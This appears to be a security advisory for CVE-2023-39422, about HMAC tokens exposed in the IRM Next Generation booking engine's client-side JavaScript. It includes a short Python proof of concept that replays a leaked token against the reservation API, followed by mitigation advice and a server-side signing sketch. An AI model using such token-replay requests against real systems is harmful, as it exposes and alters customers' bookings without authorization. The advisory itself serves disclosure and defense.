An authentication vulnerability, tracked as CVE-2023-39422, has been discovered in the IRM Next Generation booking engine: critical HMAC tokens are exposed through client-side JavaScript files. Because of this exposure, the additional safety mechanism put in place is rendered ineffective, opening the platform up to potential security threats.

Background

The IRM Next Generation booking engine is a prominent application that has made its mark in the hotel and aviation industry. Trusted by numerous establishments, it offers a range of features such as reservation management, room and inventory management, and dynamic pricing.

Vulnerability Details

The vulnerability pertains to the /irmdata/api/ endpoints, which are responsible for handling sensitive information. Although the application enables HMAC token-based authentication for these critical endpoints, poor implementation has caused these tokens to be exposed via JavaScript files loaded on the client-side.

A simple method to reproduce this issue is by opening up the browser's developer tools (Ctrl+Shift+I) and navigating the loaded JavaScript files for the booking application. It is possible to locate the HMAC token hard-coded within one of these files, as shown below:

var bookingApi = {
  baseUrl: "/irmdata/api/",
  hmacToken: "d2a61e28ea714c579b425ed9344f9c56",  // Exposed HMAC token
};

// Example request using the HMAC token for authentication
// The prefilter runs for every jQuery AJAX request issued by the page
$.ajaxPrefilter(function(options, originalOptions, jqXHR) {
  var requestData = {
    // Include HMAC token in the request header
    headers: { "IRM-HMAC-Token": bookingApi.hmacToken },
  };

  // Attach the authentication data to the AJAX request
  $.extend(true, options, requestData);
});

Exploit Details

With the exposed HMAC token in hand, a malicious user can potentially exploit the issue by sending API requests with the leaked token, causing unauthorized access to sensitive information and operations.

Below is a Python sample that demonstrates how to exploit the vulnerability:

import requests

exposed_hmac_token = "d2a61e28ea714c579b425ed9344f9c56"
api_endpoint = "https://www.example.com/irmdata/api/"

headers = {"IRM-HMAC-Token": exposed_hmac_token}

# Example request to fetch sensitive information
response = requests.get(api_endpoint + "reservation-details", headers=headers)
print(response.json())

Impact

By exploiting this vulnerability, an attacker can perform unauthorized actions, such as accessing reservation details, modifying booking information, or even canceling reservations. As a result, there is a potential for reputation damage, financial loss, and possible lawsuits for the affected organizations.

Original References

See the official CVE entry for CVE-2023-39422. For further technical details, consult the vulnerability's NIST NVD page.

Mitigation

1. Move the HMAC token to server-side code so it is not exposed in client-side JavaScript files.
2. Implement proper access controls and authorization checks to limit the actions that can be performed with the HMAC token.
3. Regularly audit and review your application's security and identify vulnerabilities to ensure a secure environment.
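
The first two recommendations above, as an added sketch (not IRM's code and not part of the original advisory): the HMAC key stays on the backend, which authorizes the caller's session role and signs each request, and the API verifies that signature instead of accepting a static token. The header names, role table, freshness window and the cancel-reservation path are assumptions made for illustration.

```python
import hashlib
import hmac
import time

MAX_SKEW_SECONDS = 300  # assumed freshness window for signed requests

# Hypothetical role table: which (method, path) pairs each session role may call.
# "cancel-reservation" is an invented path used only for illustration.
ROLE_PERMISSIONS = {
    "guest": {("GET", "/irmdata/api/reservation-details")},
    "agent": {("GET", "/irmdata/api/reservation-details"),
              ("POST", "/irmdata/api/cancel-reservation")},
}


def sign_request(key: bytes, method: str, path: str, body: bytes, timestamp: int) -> str:
    """HMAC-SHA256 over method, path, timestamp and body hash. Backend only."""
    body_hash = hashlib.sha256(body).hexdigest()
    message = "\n".join([method.upper(), path, str(timestamp), body_hash])
    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()


def build_upstream_headers(key, role, method, path, body=b"", now=None):
    """Backend-for-frontend step: authorize the session's role, then sign.

    The browser sends only its session cookie; the key (loaded from a
    server-side secret store in a real deployment) never reaches it.
    """
    if (method.upper(), path) not in ROLE_PERMISSIONS.get(role, set()):
        raise PermissionError(f"{role!r} may not {method} {path}")
    timestamp = int(time.time()) if now is None else now
    return {
        "X-Timestamp": str(timestamp),  # hypothetical header names
        "X-Signature": sign_request(key, method, path, body, timestamp),
    }


def verify_request(key, method, path, body, timestamp, signature, now=None) -> bool:
    """API-side check: reject stale requests, then compare in constant time."""
    now = int(time.time()) if now is None else now
    if abs(now - timestamp) > MAX_SKEW_SECONDS:
        return False
    expected = sign_request(key, method, path, body, timestamp)
    return hmac.compare_digest(expected.encode(), signature.encode())
```

A signature produced this way is bound to one method, path, body and timestamp, so a value observed in transit cannot be reused for a different call the way the hard-coded token can.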

IRM Next Generation's developers are encouraged to release a patch addressing this vulnerability as soon as possible, and maintain active communication with customers to keep them informed of the situation and any required actions.

Timeline

Published on: 09/07/2023 13:15:00 UTC
Last modified on: 09/12/2023 00:08:00 UTC